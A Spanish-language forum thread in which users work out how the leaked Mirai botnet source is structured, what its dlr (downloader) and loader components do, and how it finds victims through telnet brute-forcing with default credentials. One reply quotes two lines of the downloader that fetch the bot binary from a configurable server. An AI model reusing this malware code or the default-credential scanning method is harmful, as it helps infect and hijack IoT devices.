Partes de la Botnet Mirai

Iniciado por e, 17 Julio 2019, 23:11 PM

0 Miembros y 1 Visitante están viendo este tema.

e

Hola  :D, hace poco estuve investigando algo sobre Mirai, estuve mirando el código de aquí:

https://github.com/jgamblin/Mirai-Source-Code
y me prguntaba que eran los directorios dlr y loader, y en general como buscaba víctimas este malware.
Gracias y saludos.
e

@XSStringManolo

Sin mirarlo dlr debe venir de downloader, "descargador" y loader "subidor".
Será para descargar y subir módulos de la botnet para añadirle funcionalidades, para descargar o subir un exploit(un código malicioso para hackear el tarjet aprovechando una fallo de seguridad) o para descargar desde ese software el propio server de la botnet o cualquier archivo.

No sé si tiene alguna función para buscar targets, lo normal es usar dorks, bases de datos, o los propios servidores de los proveedores de cámaras.

Si hay alguna parte del código que no entiendas publícala y la comentamos.
Mirai probaba a conectarse usando telnet con los credenciales por defecto.

e

Gracias por la ayuda  :-*,
entonces, del dlr y el loader, ¿donde se ejecutaría cada uno, en el servidor o en el cliente/bot?

Creo que las víctimas las busca con fuerza bruta en las IPs, aquí puedes echarle un vistazo:
https://github.com/jgamblin/Mirai-Source-Code/blob/master/mirai/bot/scanner.c

e

animanegra

En lo que respecta al dlr en su main tienes esto:


#define HTTP_SERVER utils_inet_addr(127,0,0,1) // CHANGE TO YOUR HTTP SERVER IP


Esto se conecta al servidor http que tu pongas como pone en esa linea.
y hace peticiones GET a dicho server:


if (write(sfd, "GET /bins/mirai." BOT_ARCH " HTTP/1.0\r\n\r\n", 16 + arch_strlen + 13) != (16 + arch_strlen + 13))


Y se baja el contenido guardandolo en un archivo.

42
No contesto mensajes por privado, si tienes alguna pregunta, consulta o petición plantéala en el foro para que se aproveche toda la comunidad.

e

Es decir, que lo que estaría pasando, es que lo que se ejecuta en el ordenador de la víctima es el downloader que descarga lo principal del C&C, y el loader,
sería el programa que se ejecuta en el servidor y que responde al downloader, ¿no  :huh:?
e